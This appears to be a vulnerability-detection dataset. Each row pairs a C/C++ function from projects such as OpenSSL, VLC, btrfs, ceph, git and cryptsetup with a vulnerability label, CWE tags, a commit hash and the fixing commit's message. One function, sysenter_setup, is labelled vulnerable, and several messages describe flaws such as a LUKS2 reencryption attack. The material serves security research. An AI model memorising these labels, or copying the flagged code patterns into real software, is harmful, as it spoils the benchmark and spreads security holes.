SSL_clear(s);
#ifndef OPENSSL_NO_HEARTBEATS
/*
* If we're awaiting a HeartbeatResponse, pretend we already got and
* don't await it anymore, because Heartbeats don't make sense during
* handshakes anyway.
*/
if (s->tlsext_hb_pending) {
s->tlsext_hb_pending = 0;
s->tlsext_hb_seq++;
}
#endif
for (;;) {
state = s->state;
switch (s->state) {
case SSL_ST_RENEGOTIATE:
s->renegotiate = 1;
s->state = SSL_ST_CONNECT;
s->ctx->stats.sess_connect_renegotiate++;
/* break */
case SSL_ST_BEFORE:
case SSL_ST_CONNECT:
case SSL_ST_BEFORE | SSL_ST_CONNECT:
case SSL_ST_OK | SSL_ST_CONNECT:
s->server = 0;
if (cb != NULL)
cb(s, SSL_CB_HANDSHAKE_START, 1);
if ((s->version & 0xff00) != 0x0300) {
SSLerr(SSL_F_SSL3_CONNECT, ERR_R_INTERNAL_ERROR);
s->state = SSL_ST_ERR;
ret = -1;
goto end;
}
/* s->version=SSL3_VERSION; */
s->type = SSL_ST_CONNECT;
if (s->init_buf == NULL) {
if ((buf = BUF_MEM_new()) == NULL) {
ret = -1;
s->state = SSL_ST_ERR;
goto end;
}
if (!BUF_MEM_grow(buf, SSL3_RT_MAX_PLAIN_LENGTH)) {
ret = -1;
s->state = SSL_ST_ERR;
goto end;
}
s->init_buf = buf;
buf = NULL;
}
if (!ssl3_setup_buffers(s)) {
ret = -1;
goto end;
}
/* setup buffing BIO */
if (!ssl_init_wbio_buffer(s, 0)) {
ret = -1;
s->state = SSL_ST_ERR;
goto end;
}
/* don't push the buffering BIO quite yet */
ssl3_init_finished_mac(s);
s->state = SSL3_ST_CW_CLNT_HELLO_A;
s->ctx->stats.sess_connect++;
s->init_num = 0;
s->s3->flags &= ~SSL3_FLAGS_CCS_OK;
/*
* Should have been reset by ssl3_get_finished, too.
*/
s->s3->change_cipher_spec = 0;
break;
case SSL3_ST_CW_CLNT_HELLO_A:
case SSL3_ST_CW_CLNT_HELLO_B:
s->shutdown = 0;
ret = ssl3_client_hello(s);
if (ret <= 0)
goto end;
s->state = SSL3_ST_CR_SRVR_HELLO_A;
s->init_num = 0;
/* turn on buffering for the next lot of output */
if (s->bbio != s->wbio)
s->wbio = BIO_push(s->bbio, s->wbio);
break;
case SSL3_ST_CR_SRVR_HELLO_A:
case SSL3_ST_CR_SRVR_HELLO_B:
ret = ssl3_get_server_hello(s);
if (ret <= 0)
goto end;
if (s->hit) {
s->state = SSL3_ST_CR_FINISHED_A;
#ifndef OPENSSL_NO_TLSEXT
if (s->tlsext_ticket_expected) {
/* receive renewed session ticket */
s->state = SSL3_ST_CR_SESSION_TICKET_A;
}
#endif
} else {
s->state = SSL3_ST_CR_CERT_A;
}
s->init_num = 0;
break;
case SSL3_ST_CR_CERT_A:
case SSL3_ST_CR_CERT_B:
#ifndef OPENSSL_NO_TLSEXT
/* Noop (ret = 0) for everything but EAP-FAST. */
ret = ssl3_check_finished(s);
if (ret < 0)
goto end;
if (ret == 1) {
s->hit = 1;
s->state = SSL3_ST_CR_FINISHED_A;
s->init_num = 0;
break;
}
#endif
/* Check if it is anon DH/ECDH, SRP auth */
/* or PSK */
if (!
(s->s3->tmp.
new_cipher->algorithm_auth & (SSL_aNULL | SSL_aSRP))
&& !(s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK)) {
ret = ssl3_get_server_certificate(s);
if (ret <= 0)
goto end;
#ifndef OPENSSL_NO_TLSEXT
if (s->tlsext_status_expected)
s->state = SSL3_ST_CR_CERT_STATUS_A;
else
s->state = SSL3_ST_CR_KEY_EXCH_A;
} else {
skip = 1;
s->state = SSL3_ST_CR_KEY_EXCH_A;
}
#else
} else
skip = 1;
s->state = SSL3_ST_CR_KEY_EXCH_A;
#endif
s->init_num = 0;
break;
case SSL3_ST_CR_KEY_EXCH_A:
case SSL3_ST_CR_KEY_EXCH_B:
ret = ssl3_get_key_exchange(s);
if (ret <= 0)
goto end;
s->state = SSL3_ST_CR_CERT_REQ_A;
s->init_num = 0;
/*
* at this point we check that we have the required stuff from
* the server
*/
if (!ssl3_check_cert_and_algorithm(s)) {
ret = -1;
s->state = SSL_ST_ERR;
goto end;
}
break;
case SSL3_ST_CR_CERT_REQ_A:
case SSL3_ST_CR_CERT_REQ_B:
ret = ssl3_get_certificate_request(s);
if (ret <= 0)
goto end;
s->state = SSL3_ST_CR_SRVR_DONE_A;
s->init_num = 0;
break;
case SSL3_ST_CR_SRVR_DONE_A:
case SSL3_ST_CR_SRVR_DONE_B:
ret = ssl3_get_server_done(s);
if (ret <= 0)
goto end;
#ifndef OPENSSL_NO_SRP
if (s->s3->tmp.new_cipher->algorithm_mkey & SSL_kSRP) {
if ((ret = SRP_Calc_A_param(s)) <= 0) {
SSLerr(SSL_F_SSL3_CONNECT, SSL_R_SRP_A_CALC);
ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_INTERNAL_ERROR);
s->state = SSL_ST_ERR;
goto end;
}
}
#endif
if (s->s3->tmp.cert_req)
s->state = SSL3_ST_CW_CERT_A;
else
s->state = SSL3_ST_CW_KEY_EXCH_A;
s->init_num = 0;
break;
case SSL3_ST_CW_CERT_A:
case SSL3_ST_CW_CERT_B:
case SSL3_ST_CW_CERT_C:
case SSL3_ST_CW_CERT_D:
ret = ssl3_send_client_certificate(s);
if (ret <= 0)
goto end;
s->state = SSL3_ST_CW_KEY_EXCH_A;
s->init_num = 0;
break;
case SSL3_ST_CW_KEY_EXCH_A:
case SSL3_ST_CW_KEY_EXCH_B:
ret = ssl3_send_client_key_exchange(s);
if (ret <= 0)
goto end;
/*
* EAY EAY EAY need to check for DH fix cert sent back
*/
/*
* For TLS, cert_req is set to 2, so a cert chain of nothing is
* sent, but no verify packet is sent
*/
/*
* XXX: For now, we do not support client authentication in ECDH
* cipher suites with ECDH (rather than ECDSA) certificates. We
* need to skip the certificate verify message when client's
* ECDH public key is sent inside the client certificate.
*/
if (s->s3->tmp.cert_req == 1) {
s->state = SSL3_ST_CW_CERT_VRFY_A;
} else {
s->state = SSL3_ST_CW_CHANGE_A;
}
if (s->s3->flags & TLS1_FLAGS_SKIP_CERT_VERIFY) {
s->state = SSL3_ST_CW_CHANGE_A;
}
s->init_num = 0;
break;
case SSL3_ST_CW_CERT_VRFY_A:
case SSL3_ST_CW_CERT_VRFY_B:
ret = ssl3_send_client_verify(s);
if (ret <= 0)
goto end;
s->state = SSL3_ST_CW_CHANGE_A;
s->init_num = 0;
break;
case SSL3_ST_CW_CHANGE_A:
case SSL3_ST_CW_CHANGE_B:
ret = ssl3_send_change_cipher_spec(s,
SSL3_ST_CW_CHANGE_A,
SSL3_ST_CW_CHANGE_B);
if (ret <= 0)
goto end;
#if defined(OPENSSL_NO_TLSEXT) || defined(OPENSSL_NO_NEXTPROTONEG)
s->state = SSL3_ST_CW_FINISHED_A;
#else
if (s->s3->next_proto_neg_seen)
s->state = SSL3_ST_CW_NEXT_PROTO_A;
else
s->state = SSL3_ST_CW_FINISHED_A;
#endif
s->init_num = 0;
s->session->cipher = s->s3->tmp.new_cipher;
#ifdef OPENSSL_NO_COMP
s->session->compress_meth = 0;
#else
if (s->s3->tmp.new_compression == NULL)
s->session->compress_meth = 0;
else
s->session->compress_meth = s->s3->tmp.new_compression->id;
#endif
if (!s->method->ssl3_enc->setup_key_block(s)) {
ret = -1;
s->state = SSL_ST_ERR;
goto end;
}
if (!s->method->ssl3_enc->change_cipher_state(s,
SSL3_CHANGE_CIPHER_CLIENT_WRITE))
{
ret = -1;
s->state = SSL_ST_ERR;
goto end;
}
break;
#if !defined(OPENSSL_NO_TLSEXT) && !defined(OPENSSL_NO_NEXTPROTONEG)
case SSL3_ST_CW_NEXT_PROTO_A:
case SSL3_ST_CW_NEXT_PROTO_B:
ret = ssl3_send_next_proto(s);
if (ret <= 0)
goto end;
s->state = SSL3_ST_CW_FINISHED_A;
break;
#endif
case SSL3_ST_CW_FINISHED_A:
case SSL3_ST_CW_FINISHED_B:
ret = ssl3_send_finished(s,
SSL3_ST_CW_FINISHED_A,
SSL3_ST_CW_FINISHED_B,
s->method->
ssl3_enc->client_finished_label,
s->method->
ssl3_enc->client_finished_label_len);
if (ret <= 0)
goto end;
s->state = SSL3_ST_CW_FLUSH;
/* clear flags */
s->s3->flags &= ~SSL3_FLAGS_POP_BUFFER;
if (s->hit) {
s->s3->tmp.next_state = SSL_ST_OK;
if (s->s3->flags & SSL3_FLAGS_DELAY_CLIENT_FINISHED) {
s->state = SSL_ST_OK;
s->s3->flags |= SSL3_FLAGS_POP_BUFFER;
s->s3->delay_buf_pop_ret = 0;
}
} else {
#ifndef OPENSSL_NO_TLSEXT
/*
* Allow NewSessionTicket if ticket expected
*/
if (s->tlsext_ticket_expected)
s->s3->tmp.next_state = SSL3_ST_CR_SESSION_TICKET_A;
else
#endif
s->s3->tmp.next_state = SSL3_ST_CR_FINISHED_A;
}
s->init_num = 0;
break;
#ifndef OPENSSL_NO_TLSEXT
case SSL3_ST_CR_SESSION_TICKET_A:
case SSL3_ST_CR_SESSION_TICKET_B:
ret = ssl3_get_new_session_ticket(s);
if (ret <= 0)
goto end;
s->state = SSL3_ST_CR_FINISHED_A;
s->init_num = 0;
break;
case SSL3_ST_CR_CERT_STATUS_A:
case SSL3_ST_CR_CERT_STATUS_B:
ret = ssl3_get_cert_status(s);
if (ret <= 0)
goto end;
s->state = SSL3_ST_CR_KEY_EXCH_A;
s->init_num = 0;
break;
#endif
case SSL3_ST_CR_FINISHED_A:
case SSL3_ST_CR_FINISHED_B:
if (!s->s3->change_cipher_spec)
s->s3->flags |= SSL3_FLAGS_CCS_OK;
ret = ssl3_get_finished(s, SSL3_ST_CR_FINISHED_A,
SSL3_ST_CR_FINISHED_B);
if (ret <= 0)
goto end;
if (s->hit)
s->state = SSL3_ST_CW_CHANGE_A;
else
s->state = SSL_ST_OK;
s->init_num = 0;
break;
case SSL3_ST_CW_FLUSH:
s->rwstate = SSL_WRITING;
if (BIO_flush(s->wbio) <= 0) {
ret = -1;
goto end;
}
s->rwstate = SSL_NOTHING;
s->state = s->s3->tmp.next_state;
break;
case SSL_ST_OK:
/* clean a few things up */
ssl3_cleanup_key_block(s);
if (s->init_buf != NULL) {
BUF_MEM_free(s->init_buf);
s->init_buf = NULL;
}
/*
* If we are not 'joining' the last two packets, remove the
* buffering now
*/
if (!(s->s3->flags & SSL3_FLAGS_POP_BUFFER))
ssl_free_wbio_buffer(s);
/* else do it later in ssl3_write */
s->init_num = 0;
s->renegotiate = 0;
s->new_session = 0;
ssl_update_cache(s, SSL_SESS_CACHE_CLIENT);
if (s->hit)
s->ctx->stats.sess_hit++;
ret = 1;
/* s->server=0; */
s->handshake_func = ssl3_connect;
s->ctx->stats.sess_connect_good++;
if (cb != NULL)
cb(s, SSL_CB_HANDSHAKE_DONE, 1);
goto end;
/* break; */
case SSL_ST_ERR:
default:
SSLerr(SSL_F_SSL3_CONNECT, SSL_R_UNKNOWN_STATE);
ret = -1;
goto end;
/* break; */
}
/* did we do anything */
if (!s->s3->tmp.reuse_message && !skip) {
if (s->debug) {
if ((ret = BIO_flush(s->wbio)) <= 0)
goto end;
}
if ((cb != NULL) && (s->state != state)) {
new_state = s->state;
s->state = state;
cb(s, SSL_CB_CONNECT_LOOP, 1);
s->state = new_state;
}
}
skip = 0;
}
| 0 |
[
"CWE-310"
] |
openssl
|
10a70da729948bb573d27cef4459077c49f3eb46
| 129,320,876,501,705,790,000,000,000,000,000,000,000 | 475 |
client: reject handshakes with DH parameters < 768 bits.
Since the client has no way of communicating her supported parameter
range to the server, connections to servers that choose weak DH will
simply fail.
Reviewed-by: Kurt Roeckx <[email protected]>
|
static void MP4_FreeBox_hvcC(MP4_Box_t *p_box )
{
MP4_Box_data_hvcC_t *p_hvcC = p_box->data.p_hvcC;
if( p_hvcC->i_hvcC > 0 ) FREENULL( p_hvcC->p_hvcC) ;
}
| 0 |
[
"CWE-120",
"CWE-191",
"CWE-787"
] |
vlc
|
2e7c7091a61aa5d07e7997b393d821e91f593c39
| 228,113,900,776,925,770,000,000,000,000,000,000,000 | 5 |
demux: mp4: fix buffer overflow in parsing of string boxes.
We ensure that pbox->i_size is never smaller than 8 to avoid an
integer underflow in the third argument of the subsequent call to
memcpy. We also make sure no truncation occurs when passing values
derived from the 64 bit integer p_box->i_size to arguments of malloc
and memcpy that may be 32 bit integers on 32 bit platforms.
Signed-off-by: Jean-Baptiste Kempf <[email protected]>
|
MD5& sslHashes::use_MD5(){
return md5HandShake_;
}
| 0 |
[
"CWE-254"
] |
mysql-server
|
e7061f7e5a96c66cb2e0bf46bec7f6ff35801a69
| 331,684,796,353,565,670,000,000,000,000,000,000,000 | 3 |
Bug #22738607: YASSL FUNCTION X509_NAME_GET_INDEX_BY_NID IS NOT WORKING AS EXPECTED.
|
void btrfs_put_transaction(struct btrfs_transaction *transaction)
{
WARN_ON(refcount_read(&transaction->use_count) == 0);
if (refcount_dec_and_test(&transaction->use_count)) {
BUG_ON(!list_empty(&transaction->list));
WARN_ON(!RB_EMPTY_ROOT(
&transaction->delayed_refs.href_root.rb_root));
WARN_ON(!RB_EMPTY_ROOT(
&transaction->delayed_refs.dirty_extent_root));
if (transaction->delayed_refs.pending_csums)
btrfs_err(transaction->fs_info,
"pending csums is %llu",
transaction->delayed_refs.pending_csums);
/*
* If any block groups are found in ->deleted_bgs then it's
* because the transaction was aborted and a commit did not
* happen (things failed before writing the new superblock
* and calling btrfs_finish_extent_commit()), so we can not
* discard the physical locations of the block groups.
*/
while (!list_empty(&transaction->deleted_bgs)) {
struct btrfs_block_group *cache;
cache = list_first_entry(&transaction->deleted_bgs,
struct btrfs_block_group,
bg_list);
list_del_init(&cache->bg_list);
btrfs_unfreeze_block_group(cache);
btrfs_put_block_group(cache);
}
WARN_ON(!list_empty(&transaction->dev_update_list));
kfree(transaction);
}
}
| 0 |
[
"CWE-703",
"CWE-667"
] |
linux
|
1cb3db1cf383a3c7dbda1aa0ce748b0958759947
| 85,824,400,210,390,370,000,000,000,000,000,000,000 | 34 |
btrfs: fix deadlock with concurrent chunk allocations involving system chunks
When a task attempting to allocate a new chunk verifies that there is not
currently enough free space in the system space_info and there is another
task that allocated a new system chunk but it did not finish yet the
creation of the respective block group, it waits for that other task to
finish creating the block group. This is to avoid exhaustion of the system
chunk array in the superblock, which is limited, when we have a thundering
herd of tasks allocating new chunks. This problem was described and fixed
by commit eafa4fd0ad0607 ("btrfs: fix exhaustion of the system chunk array
due to concurrent allocations").
However there are two very similar scenarios where this can lead to a
deadlock:
1) Task B allocated a new system chunk and task A is waiting on task B
to finish creation of the respective system block group. However before
task B ends its transaction handle and finishes the creation of the
system block group, it attempts to allocate another chunk (like a data
chunk for an fallocate operation for a very large range). Task B will
be unable to progress and allocate the new chunk, because task A set
space_info->chunk_alloc to 1 and therefore it loops at
btrfs_chunk_alloc() waiting for task A to finish its chunk allocation
and set space_info->chunk_alloc to 0, but task A is waiting on task B
to finish creation of the new system block group, therefore resulting
in a deadlock;
2) Task B allocated a new system chunk and task A is waiting on task B to
finish creation of the respective system block group. By the time that
task B enter the final phase of block group allocation, which happens
at btrfs_create_pending_block_groups(), when it modifies the extent
tree, the device tree or the chunk tree to insert the items for some
new block group, it needs to allocate a new chunk, so it ends up at
btrfs_chunk_alloc() and keeps looping there because task A has set
space_info->chunk_alloc to 1, but task A is waiting for task B to
finish creation of the new system block group and release the reserved
system space, therefore resulting in a deadlock.
In short, the problem is if a task B needs to allocate a new chunk after
it previously allocated a new system chunk and if another task A is
currently waiting for task B to complete the allocation of the new system
chunk.
Unfortunately this deadlock scenario introduced by the previous fix for
the system chunk array exhaustion problem does not have a simple and short
fix, and requires a big change to rework the chunk allocation code so that
chunk btree updates are all made in the first phase of chunk allocation.
And since this deadlock regression is being frequently hit on zoned
filesystems and the system chunk array exhaustion problem is triggered
in more extreme cases (originally observed on PowerPC with a node size
of 64K when running the fallocate tests from stress-ng), revert the
changes from that commit. The next patch in the series, with a subject
of "btrfs: rework chunk allocation to avoid exhaustion of the system
chunk array" does the necessary changes to fix the system chunk array
exhaustion problem.
Reported-by: Naohiro Aota <[email protected]>
Link: https://lore.kernel.org/linux-btrfs/20210621015922.ewgbffxuawia7liz@naota-xeon/
Fixes: eafa4fd0ad0607 ("btrfs: fix exhaustion of the system chunk array due to concurrent allocations")
CC: [email protected] # 5.12+
Tested-by: Shin'ichiro Kawasaki <[email protected]>
Tested-by: Naohiro Aota <[email protected]>
Signed-off-by: Filipe Manana <[email protected]>
Tested-by: David Sterba <[email protected]>
Signed-off-by: David Sterba <[email protected]>
|
int snd_line6_hw_params(struct snd_pcm_substream *substream,
struct snd_pcm_hw_params *hw_params)
{
int ret;
struct snd_line6_pcm *line6pcm = snd_pcm_substream_chip(substream);
struct line6_pcm_stream *pstr = get_stream(line6pcm, substream->stream);
mutex_lock(&line6pcm->state_mutex);
ret = line6_buffer_acquire(line6pcm, pstr, substream->stream,
LINE6_STREAM_PCM);
if (ret < 0)
goto error;
ret = snd_pcm_lib_malloc_pages(substream,
params_buffer_bytes(hw_params));
if (ret < 0) {
line6_buffer_release(line6pcm, pstr, LINE6_STREAM_PCM);
goto error;
}
pstr->period = params_period_bytes(hw_params);
error:
mutex_unlock(&line6pcm->state_mutex);
return ret;
}
| 0 |
[
"CWE-476"
] |
linux
|
3450121997ce872eb7f1248417225827ea249710
| 264,759,564,552,193,680,000,000,000,000,000,000,000 | 25 |
ALSA: line6: Fix write on zero-sized buffer
LINE6 drivers allocate the buffers based on the value returned from
usb_maxpacket() calls. The manipulated device may return zero for
this, and this results in the kmalloc() with zero size (and it may
succeed) while the other part of the driver code writes the packet
data with the fixed size -- which eventually overwrites.
This patch adds a simple sanity check for the invalid buffer size for
avoiding that problem.
Reported-by: [email protected]
Cc: <[email protected]>
Signed-off-by: Takashi Iwai <[email protected]>
|
int AsyncConnection::send_message(Message *m)
{
FUNCTRACE();
lgeneric_subdout(async_msgr->cct, ms,
1) << "-- " << async_msgr->get_myaddr() << " --> "
<< get_peer_addr() << " -- "
<< *m << " -- " << m << " con "
<< m->get_connection().get()
<< dendl;
// optimistic think it's ok to encode(actually may broken now)
if (!m->get_priority())
m->set_priority(async_msgr->get_default_send_priority());
m->get_header().src = async_msgr->get_myname();
m->set_connection(this);
if (m->get_type() == CEPH_MSG_OSD_OP)
OID_EVENT_TRACE_WITH_MSG(m, "SEND_MSG_OSD_OP_BEGIN", true);
else if (m->get_type() == CEPH_MSG_OSD_OPREPLY)
OID_EVENT_TRACE_WITH_MSG(m, "SEND_MSG_OSD_OPREPLY_BEGIN", true);
if (async_msgr->get_myaddr() == get_peer_addr()) { //loopback connection
ldout(async_msgr->cct, 20) << __func__ << " " << *m << " local" << dendl;
std::lock_guard<std::mutex> l(write_lock);
if (can_write != WriteStatus::CLOSED) {
dispatch_queue->local_delivery(m, m->get_priority());
} else {
ldout(async_msgr->cct, 10) << __func__ << " loopback connection closed."
<< " Drop message " << m << dendl;
m->put();
}
return 0;
}
last_active = ceph::coarse_mono_clock::now();
// we don't want to consider local message here, it's too lightweight which
// may disturb users
logger->inc(l_msgr_send_messages);
bufferlist bl;
uint64_t f = get_features();
// TODO: Currently not all messages supports reencode like MOSDMap, so here
// only let fast dispatch support messages prepare message
bool can_fast_prepare = async_msgr->ms_can_fast_dispatch(m);
if (can_fast_prepare)
prepare_send_message(f, m, bl);
std::lock_guard<std::mutex> l(write_lock);
// "features" changes will change the payload encoding
if (can_fast_prepare && (can_write == WriteStatus::NOWRITE || get_features() != f)) {
// ensure the correctness of message encoding
bl.clear();
m->get_payload().clear();
ldout(async_msgr->cct, 5) << __func__ << " clear encoded buffer previous "
<< f << " != " << get_features() << dendl;
}
if (can_write == WriteStatus::CLOSED) {
ldout(async_msgr->cct, 10) << __func__ << " connection closed."
<< " Drop message " << m << dendl;
m->put();
} else {
m->trace.event("async enqueueing message");
out_q[m->get_priority()].emplace_back(std::move(bl), m);
ldout(async_msgr->cct, 15) << __func__ << " inline write is denied, reschedule m=" << m << dendl;
if (can_write != WriteStatus::REPLACING)
center->dispatch_event_external(write_handler);
}
return 0;
}
| 0 |
[
"CWE-287",
"CWE-284"
] |
ceph
|
5ead97120e07054d80623dada90a5cc764c28468
| 248,026,617,585,225,580,000,000,000,000,000,000,000 | 71 |
auth/cephx: add authorizer challenge
Allow the accepting side of a connection to reject an initial authorizer
with a random challenge. The connecting side then has to respond with an
updated authorizer proving they are able to decrypt the service's challenge
and that the new authorizer was produced for this specific connection
instance.
The accepting side requires this challenge and response unconditionally
if the client side advertises they have the feature bit. Servers wishing
to require this improved level of authentication simply have to require
the appropriate feature.
Signed-off-by: Sage Weil <[email protected]>
(cherry picked from commit f80b848d3f830eb6dba50123e04385173fa4540b)
# Conflicts:
# src/auth/Auth.h
# src/auth/cephx/CephxProtocol.cc
# src/auth/cephx/CephxProtocol.h
# src/auth/none/AuthNoneProtocol.h
# src/msg/Dispatcher.h
# src/msg/async/AsyncConnection.cc
- const_iterator
- ::decode vs decode
- AsyncConnection ctor arg noise
- get_random_bytes(), not cct->random()
|
void diff_debug_queue(const char *msg, struct diff_queue_struct *q)
{
int i;
if (msg)
fprintf(stderr, "%s\n", msg);
fprintf(stderr, "q->nr = %d\n", q->nr);
for (i = 0; i < q->nr; i++) {
struct diff_filepair *p = q->queue[i];
diff_debug_filepair(p, i);
}
}
| 0 |
[
"CWE-119"
] |
git
|
fd55a19eb1d49ae54008d932a65f79cd6fda45c9
| 238,945,759,367,792,670,000,000,000,000,000,000,000 | 11 |
Fix buffer overflow in git diff
If PATH_MAX on your system is smaller than a path stored, it may cause
buffer overflow and stack corruption in diff_addremove() and diff_change()
functions when running git-diff
Signed-off-by: Dmitry Potapov <[email protected]>
Signed-off-by: Junio C Hamano <[email protected]>
|
void crypt_set_compatibility(struct crypt_device *cd, uint32_t flags)
{
if (cd)
cd->compatibility = flags;
}
| 0 |
[
"CWE-345"
] |
cryptsetup
|
0113ac2d889c5322659ad0596d4cfc6da53e356c
| 152,457,895,875,023,850,000,000,000,000,000,000,000 | 5 |
Fix CVE-2021-4122 - LUKS2 reencryption crash recovery attack
Fix possible attacks against data confidentiality through LUKS2 online
reencryption extension crash recovery.
An attacker can modify on-disk metadata to simulate decryption in
progress with crashed (unfinished) reencryption step and persistently
decrypt part of the LUKS device.
This attack requires repeated physical access to the LUKS device but
no knowledge of user passphrases.
The decryption step is performed after a valid user activates
the device with a correct passphrase and modified metadata.
There are no visible warnings for the user that such recovery happened
(except using the luksDump command). The attack can also be reversed
afterward (simulating crashed encryption from a plaintext) with
possible modification of revealed plaintext.
The problem was caused by reusing a mechanism designed for actual
reencryption operation without reassessing the security impact for new
encryption and decryption operations. While the reencryption requires
calculating and verifying both key digests, no digest was needed to
initiate decryption recovery if the destination is plaintext (no
encryption key). Also, some metadata (like encryption cipher) is not
protected, and an attacker could change it. Note that LUKS2 protects
visible metadata only when a random change occurs. It does not protect
against intentional modification but such modification must not cause
a violation of data confidentiality.
The fix introduces additional digest protection of reencryption
metadata. The digest is calculated from known keys and critical
reencryption metadata. Now an attacker cannot create correct metadata
digest without knowledge of a passphrase for used keyslots.
For more details, see LUKS2 On-Disk Format Specification version 1.1.0.
|
void ms_handle_connect(Connection *con) override { };
| 0 |
[
"CWE-287",
"CWE-284"
] |
ceph
|
5ead97120e07054d80623dada90a5cc764c28468
| 132,577,681,684,009,430,000,000,000,000,000,000,000 | 1 |
auth/cephx: add authorizer challenge
Allow the accepting side of a connection to reject an initial authorizer
with a random challenge. The connecting side then has to respond with an
updated authorizer proving they are able to decrypt the service's challenge
and that the new authorizer was produced for this specific connection
instance.
The accepting side requires this challenge and response unconditionally
if the client side advertises they have the feature bit. Servers wishing
to require this improved level of authentication simply have to require
the appropriate feature.
Signed-off-by: Sage Weil <[email protected]>
(cherry picked from commit f80b848d3f830eb6dba50123e04385173fa4540b)
# Conflicts:
# src/auth/Auth.h
# src/auth/cephx/CephxProtocol.cc
# src/auth/cephx/CephxProtocol.h
# src/auth/none/AuthNoneProtocol.h
# src/msg/Dispatcher.h
# src/msg/async/AsyncConnection.cc
- const_iterator
- ::decode vs decode
- AsyncConnection ctor arg noise
- get_random_bytes(), not cct->random()
|
inline void base64Encode3to4(std::string_view data, std::string &output) {
uint32_t b32 = 0;
int i, j = 18;
for (i = 0; i < 3; ++i) {
b32 <<= 8;
b32 |= CharTo8Bit(data[i]);
}
for (i = 0; i < 4; ++i) {
output += base[(uint32_t)((b32 >> j) & 0x3F)];
j -= 6;
}
}
| 0 |
[
"CWE-94"
] |
js-compute-runtime
|
65524ffc962644e9fc39f4b368a326b6253912a9
| 202,903,216,359,076,700,000,000,000,000,000,000,000 | 14 |
use rangom_get instead of arc4random as arc4random does not work correctly with wizer
wizer causes the seed in arc4random to be the same between executions which is not random
|
utf32be_is_mbc_ambiguous(OnigCaseFoldType flag, const UChar** pp, const UChar* end)
{
const UChar* p = *pp;
(*pp) += 4;
if (*(p+2) == 0 && *(p+1) == 0 && *p == 0) {
int c, v;
p += 3;
if (*p == 0xdf && (flag & INTERNAL_ONIGENC_CASE_FOLD_MULTI_CHAR) != 0) {
return TRUE;
}
c = *p;
v = ONIGENC_IS_UNICODE_ISO_8859_1_BIT_CTYPE(c,
(BIT_CTYPE_UPPER | BIT_CTYPE_LOWER));
if ((v | BIT_CTYPE_LOWER) != 0) {
/* 0xaa, 0xb5, 0xba are lower case letter, but can't convert. */
if (c >= 0xaa && c <= 0xba)
return FALSE;
else
return TRUE;
}
return (v != 0 ? TRUE : FALSE);
}
return FALSE;
}
| 0 |
[
"CWE-125"
] |
php-src
|
b6fe458ef9ac1372b60c3d3810b0358e2e20840d
| 69,892,394,638,439,720,000,000,000,000,000,000,000 | 29 |
Fix bug #77418 - Heap overflow in utf32be_mbc_to_code
(cherry picked from commit aeec40cb50eca6a97975765e2bacc28a5950cfa9)
|
int __init sysenter_setup(void)
{
syscall_page = (void *)get_zeroed_page(GFP_ATOMIC);
#ifdef CONFIG_COMPAT_VDSO
__set_fixmap(FIX_VDSO, __pa(syscall_page), PAGE_READONLY);
printk("Compat vDSO mapped to %08lx.\n", __fix_to_virt(FIX_VDSO));
#endif
if (!boot_cpu_has(X86_FEATURE_SEP)) {
memcpy(syscall_page,
&vsyscall_int80_start,
&vsyscall_int80_end - &vsyscall_int80_start);
return 0;
}
memcpy(syscall_page,
&vsyscall_sysenter_start,
&vsyscall_sysenter_end - &vsyscall_sysenter_start);
return 0;
}
| 1 |
[
"CWE-264"
] |
linux-2.6
|
7d91d531900bfa1165d445390b3b13a8013f98f7
| 304,618,310,520,352,100,000,000,000,000,000,000,000 | 22 |
[PATCH] i386 vDSO: use install_special_mapping
This patch uses install_special_mapping for the i386 vDSO setup, consolidating
duplicated code.
Signed-off-by: Roland McGrath <[email protected]>
Cc: Ingo Molnar <[email protected]>
Cc: Paul Mackerras <[email protected]>
Cc: Benjamin Herrenschmidt <[email protected]>
Cc: Andi Kleen <[email protected]>
Signed-off-by: Andrew Morton <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
string expectedResult() {
return string("\0AB", 3);
}
| 0 |
[
"CWE-835"
] |
mongo
|
0a076417d1d7fba3632b73349a1fd29a83e68816
| 159,988,978,067,753,160,000,000,000,000,000,000,000 | 3 |
SERVER-38070 fix infinite loop in agg expression
|
X509Certificate::X509CertificateTransferData::Deserialize(
Environment* env,
Local<Context> context,
std::unique_ptr<worker::TransferData> self) {
if (context != env->context()) {
THROW_ERR_MESSAGE_TARGET_CONTEXT_UNAVAILABLE(env);
return {};
}
Local<Value> handle;
if (!X509Certificate::New(env, data_).ToLocal(&handle))
return {};
return BaseObjectPtr<BaseObject>(
Unwrap<X509Certificate>(handle.As<Object>()));
}
| 0 |
[
"CWE-295"
] |
node
|
466e5415a2b7b3574ab5403acb87e89a94a980d1
| 173,481,428,283,399,080,000,000,000,000,000,000,000 | 16 |
crypto,tls: implement safe x509 GeneralName format
This change introduces JSON-compatible escaping rules for strings that
include X.509 GeneralName components (see RFC 5280). This non-standard
format avoids ambiguities and prevents injection attacks that could
previously lead to X.509 certificates being accepted even though they
were not valid for the target hostname.
These changes affect the format of subject alternative names and the
format of authority information access. The checkServerIdentity function
has been modified to safely handle the new format, eliminating the
possibility of injecting subject alternative names into the verification
logic.
Because each subject alternative name is only encoded as a JSON string
literal if necessary for security purposes, this change will only be
visible in rare cases.
This addresses CVE-2021-44532.
CVE-ID: CVE-2021-44532
PR-URL: https://github.com/nodejs-private/node-private/pull/300
Reviewed-By: Michael Dawson <[email protected]>
Reviewed-By: Rich Trott <[email protected]>
|
static void tg3_read_otp_ver(struct tg3 *tp)
{
u32 val, val2;
if (tg3_asic_rev(tp) != ASIC_REV_5762)
return;
if (!tg3_ape_otp_read(tp, OTP_ADDRESS_MAGIC0, &val) &&
!tg3_ape_otp_read(tp, OTP_ADDRESS_MAGIC0 + 4, &val2) &&
TG3_OTP_MAGIC0_VALID(val)) {
u64 val64 = (u64) val << 32 | val2;
u32 ver = 0;
int i, vlen;
for (i = 0; i < 7; i++) {
if ((val64 & 0xff) == 0)
break;
ver = val64 & 0xff;
val64 >>= 8;
}
vlen = strlen(tp->fw_ver);
snprintf(&tp->fw_ver[vlen], TG3_VER_SIZE - vlen, " .%02d", ver);
}
}
| 0 |
[
"CWE-476",
"CWE-119"
] |
linux
|
715230a44310a8cf66fbfb5a46f9a62a9b2de424
| 255,737,391,273,932,970,000,000,000,000,000,000,000 | 24 |
tg3: fix length overflow in VPD firmware parsing
Commit 184b89044fb6e2a74611dafa69b1dce0d98612c6 ("tg3: Use VPD fw version
when present") introduced VPD parsing that contained a potential length
overflow.
